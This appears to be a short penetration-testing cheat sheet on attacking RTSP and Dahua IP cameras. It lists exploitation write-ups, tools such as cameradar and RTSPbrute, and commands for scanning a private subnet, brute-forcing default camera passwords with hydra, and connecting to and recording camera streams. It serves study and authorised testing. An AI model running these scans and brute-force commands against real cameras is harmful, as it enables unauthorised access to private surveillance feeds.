Resources
- CCTV Deep Dive
- By cctvforum : https://www.cctvforum.com/topic/41307-unbricking-your-dahua-ip-camera-tips-tricks-amp-firmware/
- What is RTSP : https://www.cctvcameraworld.com/what-is-rtsp/
- Zoneminder : https://zoneminder.com/
- shinobi : https://shinobi.video/
- dahuawiki : https://dahuawiki.com/IPCRemoteAccess
- Exploitation
- By hacker_might : https://medium.com/@hacker_might/how-a-2015-dahua-port-scan-became-a-zero-day-time-capsule-1f9142420e5a
- By armx64 : https://armx64.medium.com/hacking-rtsp-pwning-rtsp-2ff92e3fdce4
- By lazytech : https://systemweakness.com/rtsp-port-554-8554-how-to-exploit-674df4aca649
- By bitthebute : https://bitthebyte.medium.com/hacking-fuzzing-home-surveillance-camera-edf2fe0b4e5
Commands
- Recon
- Scaning
docker run -v /tmp:/tmp --net=host -t ullaakut/cameradar -t 10.0.70.0/24 -p 554,5554,8554 - Search for exploits
searchsploit -t Dahua
- Scaning
- Bruteforcing
nmap -sV --script "rtsp-*" 10.0.70.1 hydra -l admin -P ./Passwords/Default-Credentials/default-passwords.txt rtsp://10.0.70.250 -s 554 -V - Connecting
ffplay -rtsp_transport tcp rtsp://:@10.0.70.250:554// -x 2560 -y 1440 rtmpdump -r "rtmp://10.0.70.1:1935/live/stream" -o stream.flv -v
Cheat sheet
- By hacktricks : https://book.hacktricks.wiki/en/network-services-pentesting/554-8554-pentesting-rtsp.html
- Good one :
Tools
- Rtsp-urls.txt : https://github.com/nmap/nmap/blob/master/nselib/data/rtsp-urls.txt
- RTSPbrute : https://gitlab.com/woolf/RTSPbrute
- cameradar : https://github.com/Ullaakut/cameradar
- camera-exploit-tool : https://github.com/TasosY2K/camera-exploit-tool
- camxploit : https://github.com/spyboy-productions/CamXploit
Notes
Key Terminology & Ports
- RTSP commonly uses 554-8554/TCP port to communicate.
